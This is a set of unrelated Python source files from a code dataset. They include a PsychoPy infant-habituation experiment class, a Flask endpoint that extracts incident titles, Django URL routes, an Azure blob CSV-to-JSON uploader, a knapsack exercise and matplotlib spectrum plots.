len(self.actualTrialOrder) - 1 # Tracks the very last hab trial.\n elif self.trialOrder[i] in self.blockList.keys():\n if self.trialOrder[i] in self.blockDataList:\n start = len(self.actualTrialOrder)\n self.blockExpander(self.blockList[self.trialOrder[i]], self.trialOrder[i])\n if self.trialOrder[i] in self.blockDataList:\n end = len(self.actualTrialOrder)\n tempList = list(range(start+1,end+1))\n self.blockDataTags[self.trialOrder[i]].append(tempList)\n else:\n self.actualTrialOrder.append(self.trialOrder[i])\n if len(testMode) == 0: # If we're in test mode, skip setting up the window and launching the experiment.\n if len(self.actualTrialOrder) == 0:\n errWindow = gui.Dlg(\"Warning: No trials!\")\n errWindow.addText(\n \"There are no trials in the study flow! Please return to the builder and add trials to the study flow.\")\n errWindow.show()\n else:\n self.SetupWindow()\n else:\n self.run()\n\n def blockExpander(self, blockTrials, prefixes, hab=False, habNum=0, insert=-1):\n \"\"\"\n A method for constructing actualTrialOrder while dealing with recursive blocks. Can create incredibly long trial\n codes, but ensures that all information is accurately preserved. Works for both hab blocks and other things.\n For hab blocks, we can take advantage of the fact that hab cannot appear inside any other block. It will always\n be the top-level block, and so we can adjust the prefix once and it will carry through.\n\n :param blockTrials: The list of trials in self.blockList or self.habSubTrials\n :type blockTrials: list\n :param prefixes: A recursively growing stack of prefixes. If block A has B and block B has C, then an instance of A will be A.B.C in self.actualTrialOrder. This keeps track of the A.B. part.\n :type prefixes: str\n :param hab: Are we dealing with a habituation trial expansion?\n :type hab: bool\n :param habNum: If we are dealing with a habituation trial expansion, what number of it are we on?\n :type habNum: int\n :param insert: An int specifying where in actualTrialOrder to put a trial. Needed to generalize this function for insertHab\n :type insert: int\n :return:\n :rtype:\n \"\"\"\n if hab:\n prefixes = prefixes + str(habNum)\n for q in range(0, len(blockTrials)):\n tempName = blockTrials[q]\n if tempName in self.blockList.keys():\n if tempName in self.blockDataList:\n start = len(self.actualTrialOrder)\n self.blockExpander(self.blockList[tempName], prefixes+'.'+tempName, hab=False, insert=insert)\n if tempName in self.blockDataList:\n end = len(self.actualTrialOrder)\n tempList = list(range(start + 1, end + 1))\n self.blockDataTags[tempName].append(tempList)\n if hab and q == len(self.habTrialList) - 1: # Go back and pin on the ^ if needed. A little cheaty\n revise = deepcopy(self.actualTrialOrder[-1])\n revise = revise[:revise.index('.')] + '^' + revise[revise.index('.'):]\n self.actualTrialOrder[-1] = revise\n else:\n if hab and q == len(self.habTrialList) - 1:\n prefixes = prefixes + '^' # End-of-hab-cycle marker\n tempName = prefixes + '.' + tempName\n if insert == -1:\n self.actualTrialOrder.append(tempName)\n else:\n self.actualTrialOrder.insert(insert, tempName)\n insert += 1\n\n def SetupWindow(self):\n \"\"\"\n Sets up the stimulus presentation and coder windows, loads all the stimuli, then starts the experiment\n with doExperiment()\n\n :return:\n :rtype:\n \"\"\"\n\n #VM ADDED\n pti.infant_tobii_controller.leapCalibrateBaby()\n\n # Important to do this first because it gets the windows in the correct order for focus etc.\n\n #VM CHANGED SELF.WIN FULLSCR TO TRUE\n if self.stimPres:\n # Stimulus presentation window\n self.win = visual.Window((self.screenWidth, self.screenHeight), fullscr=True, screen=self.screenIndex, allowGUI=False,\n units='pix', color=self.screenColor)\n self.dummyThing = visual.Circle(self.win, size=1, color=self.win.color) # This is for fixing a display glitch in PsychoPy3 involving multiple windows of different sizes.\n # Coder window\n self.win2 = visual.Window((400, 400), fullscr=False, screen=self.expScreenIndex, allowGUI=True, units='pix', waitBlanking=False,\n rgb=[-1, -1, -1])\n\n #VM ADDED\n self.controller = pti.infant_tobii_controller(self.win)\n self.controller.start_recording('data/toerase2.tsv', embed_event = True)\n\n if self.stimPres:\n tempText = visual.TextStim(self.win2, text=\"Loading Stimuli\", pos=[0, 0], color='white', bold=True, height=40)\n tempText.draw()\n self.win2.flip()\n # Step 1: Load and present \"startImage\"\n if self.startImage is not '':\n self.dummyThing.draw()\n tempStim = self.stimList[self.startImage]\n tempStimObj = visual.ImageStim(self.win, tempStim['stimLoc'], size=[self.movieWidth, self.movieHeight])\n tempStimObj.draw()\n self.win.flip() # This should now be on the screen until the first attngetter\n self.stimDict = {x: [] for x in self.stimNames.keys()} # This holds all the loaded movies.\n self.counters = {x: 0 for x in self.stimNames.keys()} # list of counters, one per index of the dict, so it knows which movie to play\n tempCtr = {x: 0 for x in self.stimNames.keys()}\n for i in self.actualTrialOrder:\n # Adjust for hab sub-trials. Looks for a very specific set of traits, which could occur, but...shouldn't.\n if '.' in i:\n tempI = i\n while '.' in tempI:\n tempI = tempI[tempI.index('.')+1:]\n i = tempI\n x = tempCtr[i] # Changed so hab trials get the same treatment as everything else.\n if x < len(self.stimNames[i]):\n tempStim = self.stimList[self.stimNames[i][x]]\n if tempStim['stimType'] == 'Movie':\n tempStimObj = visual.MovieStim3(self.win, tempStim['stimLoc'],\n size=[self.movieWidth, self.movieHeight], flipHoriz=False,\n flipVert=False, loop=False)\n elif tempStim['stimType'] == 'Image':\n tempStimObj = visual.ImageStim(self.win, tempStim['stimLoc'],\n size=[self.movieWidth, self.movieHeight])\n elif tempStim['stimType'] == 'Audio':\n tempStimObj = sound.Sound(tempStim['stimLoc'])\n else: # The eternal problem of audio/image pair. Just creates an object that's a dict of audio and image.\n audioObj = sound.Sound(tempStim['audioLoc'])\n imageObj = visual.ImageStim(self.win, tempStim['imageLoc'],\n size=[self.movieWidth, self.movieHeight])\n tempStimObj = {'Audio': audioObj, 'Image': imageObj}\n tempAdd = {'stimType':tempStim['stimType'], 'stim':tempStimObj}\n self.stimDict[i].append(tempAdd)\n tempCtr[i] += 1\n\n if len(list(self.playAttnGetter.keys())) > 0:\n for i in list(self.attnGetterList.keys()):\n if self.attnGetterList[i]['stimType'] == 'Audio':\n self.attnGetterList[i]['file'] = sound.Sound(self.attnGetterList[i]['stimLoc'])\n else:\n self.attnGetterList[i]['file'] = visual.MovieStim3(self.win, self.attnGetterList[i]['stimLoc'],\n size=[self.movieWidth, self.movieHeight],\n flipHoriz=False, flipVert=False, loop=False)\n if self.endImage is not '': # Load image for end of experiment, if needed.\n tempStim = self.stimList[self.endImage]\n self.endImageObject = visual.ImageStim(self.win, tempStim['stimLoc'], size=[self.movieWidth, self.movieHeight])\n else:\n self.endImageObject = None\n self.keyboard = self.key.KeyStateHandler()\n self.win2.winHandle.push_handlers(self.keyboard)\n if self.stimPres:\n self.win.winHandle.push_handlers(self.keyboard)\n self.baseSize = 40 # Base size of all attention-getters, in pixels\n self.attnGetterSquare = visual.Rect(self.win, height=self.baseSize, width=self.baseSize, pos=[self.testOffset + 0, 0], fillColor='black')\n self.attnGetterCross = visual.ShapeStim(self.win, vertices='cross', size=self.baseSize, pos=[self.testOffset + 0, 0], fillColor='black')\n\n numVertices = 10\n starRad = self.baseSize #This creates a large but static rotating star. It does not loom.\n starVerts = []\n for x in range(0,numVertices):\n if x % 2 == 1:\n tempRad = starRad*.55 # How much to draw in between the \"points\"\n else:\n tempRad = starRad\n tempVert = [tempRad*sin((2*pi)/numVertices * x), tempRad*cos((2*pi)/numVertices * x)]\n starVerts.append(tempVert)\n\n self.attnGetterStar = visual.ShapeStim(self.win, vertices=starVerts, pos=[self.testOffset + 0, 0], fillColor='black')\n\n self.statusSquareA = visual.Rect(self.win2, height=80, width=80,\n pos=[self.statusOffset - 60, self.statusOffsetY + 0],\n fillColor='black') # These two appear on the status screen window.\n self.statusSquareB = visual.Rect(self.win2, height=80, width=80,\n pos=[self.statusOffset + 60, self.statusOffsetY + 0], fillColor='black')\n self.statusTextA = visual.TextStim(self.win2, text=\"\", pos=[self.statusOffset - 60, self.statusOffsetY + 0],\n color='white', bold=True, height=30)\n self.statusTextB = visual.TextStim(self.win2, text=\"\", pos=[self.statusOffset + 60, self.statusOffsetY + 0],\n color='white', bold=True, height=30)\n self.trialText = visual.TextStim(self.win2, text=\"Trial no: \", pos=[-100, 150], color='white')\n self.readyText = visual.TextStim(self.win2, text=\"Trial not active\", pos=[-25, 100], color='white')\n \n #VM ADDED\n print('experiment starting...')\n \n self.doExperiment() # Get this show on the road!\n","sub_path":"Stimuli presentation/PyHab/PyHabClass.py","file_name":"PyHabClass.py","file_ext":"py","file_size_in_byte":124492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"158742750","text":"#!/usr/bin/env python\n#\n# Copyright 2014 Simone Campagna\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nfrom .configobj_wrap import ConfigObjWrap\n\n\n__author__ = \"Simone Campagna\"\n__all__ = [\n 'MetaConfigment',\n]\n\n\nclass MetaConfigment(ConfigObjWrap.__class__):\n def __new__(mcs, class_name, class_bases, class_dict):\n cls = super(MetaConfigment, mcs).__new__(mcs, class_name, class_bases, class_dict)\n configspec_source = getattr(cls, 'CONFIGSPEC_SOURCE', '')\n configspec = ConfigObjWrap(\n infile=configspec_source.split('\\n'),\n interpolation=False,\n list_values=False,\n )\n mcs._extend_section(configspec)\n setattr(cls, \"CONFIGSPEC\", configspec)\n return cls\n\n @classmethod\n def _extend_section(mcs, section):\n if not hasattr(section, '__validate__'):\n section['__validate__'] = 'boolean(default=True)'\n if not hasattr(section, '__base_dir__'):\n section['__base_dir__'] = 'string(default=\"\")'\n for section_name in section.sections:\n mcs._extend_section(section[section_name])\n","sub_path":"src/configment/meta_configment.py","file_name":"meta_configment.py","file_ext":"py","file_size_in_byte":1625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"226538315","text":"# -- coding: utf-8 --\nfrom donor import Person\nfrom event import Event\nfrom msvcrt import getch\nimport os\nimport time\n\nclass MainOld:\n @staticmethod\n def select_menu():\n while True:\n os.system('cls')\n print(\"<~~~~~~~~----------------------^^^^^^^----------------------~~~~~~~>\")\n print(\"Welcome in the blood donor and event location register application!\")\n print(\"Please select what would you like to register:\\n1 - Donor registration\\n2 - Donor event location registration\"\n \"\\n3 - Exit\")\n menu = input(\">> \")\n if menu == \"1\":\n Person.donor_register_app()\n print(\"\\n\")\n break\n elif menu == \"2\":\n Event.event_data()\n print(\"\\n\")\n break\n elif menu == \"3\":\n exit()\n else:\n print(\"Please select a valid menu number!\")\n time.sleep(1.4)\n\nMainOld.select_menu()","sub_path":"main_old.py","file_name":"main_old.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"387668455","text":"#!/usr/bin/env python3\n\n\"\"\"\nTittle generations.\n\"\"\"\n# Time: 2018-01-31T06:11:05.638Z\n# Author: Zili Wang\n# E-mail: zili_wang@163.com\n\nfrom flask_restful import Resource\nfrom flask import request\nfrom incident import PACKAGE_ROOT\nimport sys\nfrom incident.model.boltitleextraction import BolTitleExtraction\nfrom wtforms import Form, StringField, validators, IntegerField\nfrom flask import current_app as app\nimport json\n\n\nclass TittleExtractor(Resource):\n \"\"\"\n @api {post} tittle Request recommend incident tittle\n @apiVersion 0.1.0\n @apiGroup INCIDENT\n @apiName Recommend incident Tittle\n @apiParam {string} desc description of incident\n @apiSuccessExample {json} Success-Response:\n \"a sample of a tittle.\"\n \"\"\"\n \"\"\"\n @api {post} /tittle Request recommend incident tittle\n @apiVersion 0.1.1\n @apiGroup INCIDENT\n @apiName Recommend incident Tittle\n @apiParam {string} model 项目模型,'ecu'表示厄瓜多尔,'bol'表示玻利维亚\n @apiParam {int} id 二级警情编号\n @apiParam {string} desc 警情描述\n @apiSuccessExample {json} Success-Response:\n {\n \"tittle\": \"a la altura del colegio teniente hugo ortiz -diagonagl al parque de los samanes alertante indica camioneta esta en la via rapida, informante sr. lalama 0999163219\",\n \"keywords\": [\n \"via\",\n \"av\",\n \"camioneta\",\n \"altura\",\n \"ref\"\n ]\n }\n \"\"\"\n \"\"\"\n @api {post} /tittle Request recommend incident tittle\n @apiVersion 1.0.0\n @apiGroup INCIDENT\n @apiName Recommend incident Tittle\n @apiParam {int} id 二级警情编号\n @apiParam {string} desc 警情描述\n @apiSuccessExample {json} Success-Response:\n {\n \"tittle\": \"a la altura del colegio teniente hugo ortiz -diagonagl al parque de los samanes alertante indica camioneta esta en la via rapida, informante sr. lalama 0999163219\",\n \"keywords\": [\n \"via\",\n \"av\",\n \"camioneta\",\n \"altura\",\n \"ref\"\n ]\n }\n @apiError (701) {json} illegalParams 传入参数错误,详情参考返回json。\n \"\"\"\n bolmodel = BolTitleExtraction(system='bol')\n\n def post(self):\n form = ParametersValidator(request.form)\n if not form.validate():\n app.logger.warn('Tittle|Illegal Parameters: {}'.format(\n json.dumps(form.errors)\n ))\n return form.errors, 701\n desc = form.desc.data.lower()\n title, keywords = self.bolmodel.extract(desc, form.id.data)\n return {'tittle': title, 'keywords': keywords}\n\n\nclass ParametersValidator(Form):\n id = IntegerField(\n 'id',\n [validators.DataRequired(message='no subtype id.')],\n )\n desc = StringField(\n 'desc',\n [validators.DataRequired(message='no description')])\n","sub_path":"incident/IncidentTitleExtraction.py","file_name":"IncidentTitleExtraction.py","file_ext":"py","file_size_in_byte":3108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"91847817","text":"class CompressString(object):\n\n def compress(self, string):\n\n if string is None or string == \"\":\n return string\n tem = []\n print(string)\n i = 0\n while i < len(string)-1:\n tem.append(string[i])\n print(tem)\n if string[i] != string[i+1]:\n tem.append(\" \")\n i = i + 1\n tem.append(string[-1])\n st = \"\".join(tem).split()\n s = \"\"\n for j in st:\n if len(j) > 1:\n s = s + j[0]\n s = s + str(len(j))\n else:\n s = s + j\n if len(s) == len(string):\n return string\n else:\n return s\n\n\n\n","sub_path":"python100/compress_str.py","file_name":"compress_str.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"498230978","text":"from django.conf.urls import url\nfrom django.urls import path\n\nfrom . import views\n\napp_name = 'groups'\n\nurlpatterns = [\n path('academic_groups/', views.AcademicGroupDetailView.as_view(), name='academicgroup_detail'),\n path('students/new', views.StudentCreateView.as_view(), name='student_create'),\n path('students//delete', views.StudentDeleteView.as_view(), name='student_delete'),\n path('students/', views.StudentDetailView.as_view(), name='student_detail'),\n path('exams/', views.AcademicGroupExamListView.as_view(), name='exam_list'),\n path('exams/new', views.AcademicGroupExamCreateView.as_view(), name='exam_create'),\n path('exams//delete', views.AcademicGroupExamDeleteView.as_view(), name='exam_delete'),\n url(r'^student/(?P[0-9]+)/edit_student_exams/$', views.edit_student_exams, name='edit_student_exams'),\n url(r'^events/$', views.events, name='events'),\n url(r'^add_event/$', views.add_event, name='add_event'),\n url(r'^event/add_student/$', views.event_add_student, name='event_add_student'),\n url(r'^edit_event_group/$', views.edit_event_group, name='edit_event_group'),\n url(r'^delete_event_group/$', views.delete_event_group, name='delete_event_group'),\n url(r'^jury/$', views.jury, name='jury'),\n]\n","sub_path":"academic_groups/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"521383575","text":"import os\nimport requests\nimport mmap\nimport gzip\nimport csv\nimport json\nimport sys\nimport subprocess\nimport platform\nimport re\n\nfrom azure.storage.blob import BlobServiceClient, BlobClient, BlobClient, ContainerClient\nfrom dotenv import load_dotenv\nfrom urllib.parse import urlparse\nfrom datetime import datetime\n\n\n# Input the filecontents here\nfilecontent = \"https://data.govt.lc/sites/default/files/Estimated%20fish%20landings.csv\"\n\n# Auxilary functions\ndef executeCProgram(CprogramFileName, systemType):\n command = []\n if 'Linux' in systemType:\n subprocess.call([\"gcc\", CprogramFileName, '-o', 'Cprogram']) # For Compiling\n command = ['./Cprogram']\n elif 'Windows' in systemType:\n subprocess.call([\"gcc\", CprogramFileName])\n subprocess.call('a.exe')\n command = ['./Cprogram']\n elif 'Darwin' in systemType:\n subprocess.call([\"gcc\", CprogramFileName])\n command = ['./a.out']\n p = subprocess.Popen(command, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n p.communicate(input='dataToReadFile.txt\\n'.encode())[0]\n\n\ndef writeInputForParser(WODFileName, CSVFileName):\n dataToReadFile = open(\"dataToReadFile.txt\", \"w\")\n dataToReadFile.write(WODFileName + \"\\n\")\n dataToReadFile.write(\"0\\nA\\n\")\n dataToReadFile.write(CSVFileName + \"\\n1\\n\")\n dataToReadFile.close()\n\ndef ungz(filename):\n fname = filename.replace(\".gz\", \"\")\n gfile = gzip.GzipFile(filename)\n open(fname, \"wb+\").write(gfile.read())\n gfile.close()\n \ndef tidyname(filename):\n pattern = '[A-Za-z][A-Za-z0-9]'\n tidy_name = \"\".join(re.findall(pattern, os.path.splitext(filename)[0]))\n \n if len(tidy_name) > 63:\n tidy_name = tidy_name[:63]\n elif len(tidy_name) < 3:\n tidy_name = tidy_name + datetime.now().strftime(\"%H%M%S\")\n \n return tidy_name\n\ndef get_credentials():\n load_dotenv()\n return os.getenv('AZURE_CONNECTION_STRING'), os.getenv(\"AZURE_CONTAINER_NAME\")\n\ndef uploadToBlob():\n connection_string, container_name = get_credentials()\n blob_service_client = BlobServiceClient.from_connection_string(connection_string)\n containerclient = blob_service_client.get_container_client(container_name)\n\n url = urlparse(filecontent)\n u = requests.get(filecontent, stream=True)\n filename = os.path.basename(url.path)\n pre, ext = os.path.splitext(filename)\n updated_filename = tidyname(pre) + \".json\"\n \n # This checks if a blob is already existed\n blob = BlobClient.from_connection_string(conn_str=connection_string, container_name=container_name, blob_name=updated_filename)\n if blob.exists():\n blob.delete_blob(delete_snapshots=False)\n \n # If a gz file is downloaded, unzip it and decode it into a csv file\n if ext == \".gz\":\n with open(filename, 'wb') as f:\n f.write(u.content)\n ungz(filename)\n CprogramFileName = \"wodtodepthmatrix.c\"\n WODFileName = pre\n filename = WODFileName + \".csv\"\n # Creates the csv file named as filename\n writeInputForParser(WODFileName, filename)\n executeCProgram(CprogramFileName, platform.system())\n # Remove the unzipped file and downloaded gz file\n os.remove(os.path.abspath(WODFileName + \".gz\"))\n\n # If a csv file is downloaded, creates a csv file\n if ext == \".csv\":\n with open(filename, \"wb\") as f:\n f.write(u.content)\n\n # Converts the csv file into a Json file\n with open(filename, \"r+b\") as f:\n mm = mmap.mmap(f.fileno(), 0) \n mm.seek(0)\n ls = []\n for i in range(mm.size()):\n byte = mm.readline()\n line = byte.decode('utf-8', 'ignore')\n line = line.strip()\n line = line.split(',')\n line = list(filter(lambda a: a != '', line))\n if len(line) == 0:\n continue\n ls.append(line)\n \n for i in range(1, len(ls)):\n ls[i] = dict(zip(ls[0], ls[i]))\n in_json = json.dumps(ls[1:], indent=4)\n \n # Connects to the cilent and upload the data to the Blob\n blob_client = containerclient.get_blob_client(updated_filename)\n blob_client.upload_blob(in_json, metadata=None)\n # Removes the csv file created\n os.remove(os.path.abspath(filename))\n if os.path.exists(pre):\n os.remove(os.path.abspath(pre))\n f.close()\n mm.close()\n return in_json\n\ndef getBlobFromAzure():\n connection_string, container_name = get_credentials()\n \n url = urlparse(filecontent)\n filename = os.path.basename(url.path)\n pre, ext = os.path.splitext(filename)\n updated_filename = tidyname(pre) + \".json\"\n \n blob = BlobClient.from_connection_string(conn_str=connection_string, container_name=container_name, blob_name=updated_filename)\n blob_data = blob.download_blob().readall()\n json_file_content = blob_data.decode('utf8').replace(\"'\",'\"')\n jlist = json.loads(json_file_content)\n \n return jlist \n \nif __name__ == '__main__':\n uploaded_json = json.loads(uploadToBlob())\n downloaded_json = getBlobFromAzure()\n print(uploaded_json == downloaded_json)\n ","sub_path":"COMP0016_2020_21_Team12-datasetsExperimentsAna/Main/tests/TestUrlToAzureStorage.py","file_name":"TestUrlToAzureStorage.py","file_ext":"py","file_size_in_byte":5217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"414855759","text":"# Uses python3\nimport sys\n\n# input is capacity(int) and list of weigths with position same as list of values\ndef get_optimal_value(capacity, weights, values):\n # init list of value per KG\n ValuePerKg = [v / w for v,w in zip(values,weights) ]\n # sort desc weights and values according to ValuePerKg list\n weights_sorted = [x for _,x in sorted(zip(ValuePerKg,weights), reverse=True)]\n # values_sorted = [x for _,x in sorted(zip(ValuePerKg,values), reverse=True)]\n ValuePerKg_sorted = sorted(ValuePerKg,reverse=True)\n # after already sorted (most value/kg is leftmost), we get the left most item first\n n = len(weights)\n # initialize total value in bag\n value = 0\n for i in range(n):\n if capacity == 0:\n return(value)\n a = min(capacity,weights_sorted[i])\n value += a * (ValuePerKg_sorted[i])\n weights_sorted[i] -= a\n capacity -= a \n return value\n\n\nprint(get_optimal_value(50,[20,50,30],[60,100,120]))\n# print(get_optimal_value(10,[30],[500]))\n\n\n# if __name__ == \"__main__\":\n# data = list(map(int, sys.stdin.read().split()))\n# n, capacity = data[0:2]\n# values = data[2:(2 * n + 2):2]\n# weights = data[3:(2 * n + 2):2]\n# opt_value = get_optimal_value(capacity, weights, values)\n# print(\"{:.10f}\".format(opt_value))\n\n\n# Psuedo code\n\n# def Knapsack(W,w1,v1,...,w_n,v_n): # where W is capacity\n\n# # amount is place in knapsack\n# amount = [0] * (len(n))\n# totalValue = 0\n# repeat n times:\n# # W = 0 mean the knapsack is full then return total value\n# if W =0:\n# return (totalValue, amounts)\n# # set i = index of largest value/ kg\n# i = BestItem(W,w1,v1,...,w_n,v_n)\n# # compute how much to take of this item\n# # compare item weight (w_i) and space left in kanpsack(W). If item weight smaller mean can fit all then we take all\n# # if space in Knapsack is smaller then we take this item just to complete fill knapsack\n# a = min (w_i,W)\n# totalValue = totalValue + a *(vi/wi)\n# # update reamining quantity to 0 by minus a so we know that we already take this one to knapsack\n# wi = wi - a\n# # update place in knapsack of the amount we took in\n# # have to plus it self because 0.5 could come form other item\n# amount[i] = amount[i] + a\n# # update decrease the capacity\n# W = W-a\n# return (totalValue, amount)\n\n \n\n# copy from internet. this better version sort only one time\ndef get_optimal_value(capacity, weights, values):\n value = 0.\n proportion = [float(v) / float(w) for v, w in zip(values, weights)]\n for _ in range(len(weights) + 1):\n if capacity == 0:\n return value\n break\n max_weight = max(proportion)\n index = proportion.index(max_weight)\n proportion[index] = -1\n add_capacity = min(capacity, weights[index])\n value += add_capacity * max_weight\n weights[index] -= add_capacity\n capacity -= add_capacity\n return value","sub_path":"01AlgorithmicDesignandTechniques/week3_greedy_algorithms_starters/2_maximum_value_of_the_loot/fractional_knapsack.py","file_name":"fractional_knapsack.py","file_ext":"py","file_size_in_byte":3073,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"92472707","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.colorbar import Colorbar\nfrom matplotlib import gridspec\n\n# define grid parameters\nX = np.load('X.npy')\nYh = np.load('Yh.npy')\nZ = np.load('Z.npy')\nYv = np.load('Yv.npy')\nkx = np.load('kx.npy')\nky = np.load('ky.npy')\nky2 = np.load('ky2.npy')\n\n# define plot parameters\ncmap = plt.get_cmap('viridis')\ncmap2 = plt.get_cmap('inferno')\nticksize = 14\nfsize = 16\n\n# Load spectra files\nnkx, nky = kx.shape\nek_xy_nl = np.load('ek_xy_nl.npy')\nek_xy_gql2 = np.load('ek_xy_gql2.npy')\nek_xy_gql3 = np.load('ek_xy_gql3.npy')\nek_xy_gql8 = np.load('ek_xy_gql8.npy')\nek_xy_ql = np.load('ek_xy_ql.npy')\nu_xy_NW_nl = np.load('u_xy_NW_nl.npy')\nu_xy_NW_gql2 = np.load('u_xy_NW_gql2.npy')\nu_xy_NW_gql3 = np.load('u_xy_NW_gql3.npy')\nu_xy_NW_gql8 = np.load('u_xy_NW_gql8.npy')\nu_xy_NW_ql = np.load('u_xy_NW_ql.npy')\n\n# Find index of max energy spectra\nind_ek_ql = np.unravel_index(np.argmax(ek_xy_ql, axis=None), ek_xy_ql.shape)\nind_ek_gql2 = np.unravel_index(np.argmax(ek_xy_gql2, axis=None), ek_xy_gql2.shape)\nind_ek_gql3 = np.unravel_index(np.argmax(ek_xy_gql3, axis=None), ek_xy_gql3.shape)\nind_ek_gql8 = np.unravel_index(np.argmax(ek_xy_gql8, axis=None), ek_xy_gql3.shape)\nind_ek_dns = np.unravel_index(np.argmax(ek_xy_nl, axis=None), ek_xy_nl.shape)\n\ndef nw_Ekxy(nx, ny):\n ld = nx / 2\n # Define max/mins for shared colorbar\n combined_u_xy_NW = np.array([u_xy_NW_ql, u_xy_NW_gql3, u_xy_NW_nl])\n u_xy_NW_min, u_xy_NW_max = np.amin(combined_u_xy_NW), np.amax(combined_u_xy_NW)\n combined_ek_xy = np.array([ek_xy_ql, ek_xy_gql3, ek_xy_nl]) # leave QL out of this for now (or forever)\n ek_xy_min, ek_xy_max = np.amin(combined_ek_xy), np.amax(combined_ek_xy)\n\n fig = plt.figure(7, figsize=(15, 8))\n gs = gridspec.GridSpec(2, 5, width_ratios=[1, 1, 1, 1, 0.05], height_ratios=[1, 1])\n gs.update(left=0.05, right=0.95, bottom=0.09, top=0.9, wspace=0.2, hspace=0.2)\n # set axes (2 rows, 5 columns per row... [ql, colorbar, extra row for spacing, gql, dns, sharedcolorbar]\n ax00 = fig.add_subplot(gs[0, 0])\n ax01 = fig.add_subplot(gs[0, 1], sharey=ax00)\n ax02 = fig.add_subplot(gs[0, 2], sharey=ax00)\n ax03 = fig.add_subplot(gs[0, 3], sharey=ax00)\n ax10 = fig.add_subplot(gs[1, 0])\n ax11 = fig.add_subplot(gs[1, 1], sharey=ax10)\n ax12 = fig.add_subplot(gs[1, 2], sharey=ax10)\n ax13 = fig.add_subplot(gs[1, 3], sharey=ax10)\n # Define plots\n plt00 = ax00.contourf(X, Yh, np.flipud(u_xy_NW_ql), vmax=u_xy_NW_max, vmin=u_xy_NW_min,cmap=cmap) # name to create mappable for colorbar\n plt01 = ax01.contourf(X, Yh, np.flipud(u_xy_NW_gql3), vmax=u_xy_NW_max, vmin=u_xy_NW_min, cmap=cmap)\n plt02 = ax02.contourf(X, Yh, np.flipud(u_xy_NW_gql8), vmax=u_xy_NW_max, vmin=u_xy_NW_min, cmap=cmap)\n plt03 = ax03.contourf(X, Yh, np.flipud(u_xy_NW_nl), vmax=u_xy_NW_max, vmin=u_xy_NW_min,cmap=cmap) # set vmax/vmin to normalize cbar\n plt10 = ax10.contourf(kx[1:11, 1:int(ny/5)], ky2[1:11, 1:int(ny/5)], ek_xy_ql[0:10, 0:15], vmax=ek_xy_max, vmin=ek_xy_min, cmap=cmap2) # name to create mappable for colorbar\n plt11 = ax11.contourf(kx[1:11, 1:int(ny/5)], ky2[1:11, 1:int(ny/5)], ek_xy_gql3[0:10, 0:15], vmax=ek_xy_max, vmin=ek_xy_min, cmap=cmap2) # name to create mappable for colorbar\n plt12 = ax12.contourf(kx[1:11, 1:int(ny/5)], ky2[1:11, 1:int(ny/5)], ek_xy_gql8[0:10, 0:15], vmax=ek_xy_max, vmin=ek_xy_min, cmap=cmap2)\n plt13 = ax13.contourf(kx[1:11, 1:int(ny/5)], ky2[1:11, 1:int(ny/5)], ek_xy_nl[0:10, 0:15], vmax=ek_xy_max, vmin=ek_xy_min,cmap=cmap2)\n # Labels\n # fig.suptitle('2D Horizontal (x-y) Energy Spectrum, Near Wall', size=18)\n ax00.set_title('$\\Lambda_x$ = 0 (QL)', size=14)\n ax00.set_ylabel('y', size=fsize, rotation=0)\n ax00.tick_params(axis='both', which='major', labelsize=ticksize)\n ax00.set_xlabel('x', size=fsize)\n ax01.set_title('$\\Lambda_x$ = 3 (GQL)', size=fsize)\n ax01.set_xlabel('x', size=fsize)\n ax01.tick_params(axis='both', which='major', labelsize=ticksize)\n ax02.set_title('$\\Lambda_x$ = 8 (GQL)', size=fsize)\n ax02.set_xlabel('x', size=fsize)\n ax02.tick_params(axis='both', which='major', labelsize=ticksize)\n ax03.set_title('$\\Lambda_x$ = %i (NL)' % ld, size=fsize)\n ax03.set_xlabel('x', size=fsize)\n ax03.tick_params(axis='both', which='major', labelsize=ticksize)\n ax10.set_ylabel('$k_y$', size=fsize, rotation=0)\n ax10.set_xlabel('$k_x$', size=fsize)\n ax10.tick_params(axis='both', which='major', labelsize=ticksize)\n ax10.set_yscale('log')\n ax10.set_xscale('log')\n ax11.set_xlabel('$k_x$', size=fsize)\n ax11.tick_params(axis='both', which='major', labelsize=ticksize)\n ax11.set_yscale('log')\n ax11.set_xscale('log')\n ax12.set_xlabel('$k_x$', size=fsize)\n ax12.tick_params(axis='both', which='major', labelsize=ticksize)\n ax12.set_xscale('log')\n ax12.set_yscale('log')\n ax13.set_xlabel('$k_x$', size=fsize)\n ax13.tick_params(axis='both', which='major', labelsize=ticksize)\n ax13.xaxis.set_minor_locator(plt.MaxNLocator(0))\n ax13.set_xscale('log')\n ax13.set_yscale('log')\n # Set colorbars\n cbax04 = plt.subplot(gs[0, 4])\n cbax14 = plt.subplot(gs[1, 4])\n cb04 = Colorbar(ax=cbax04, mappable=plt01, orientation='vertical', ticklocation='right')\n cb14 = Colorbar(ax=cbax14, mappable=plt10, orientation='vertical', ticklocation='right')\n cb04.ax.set_yticklabels(cb04.ax.get_yticklabels(), fontsize=ticksize)\n cb04.ax.yaxis.set_major_locator(plt.MaxNLocator(5))\n 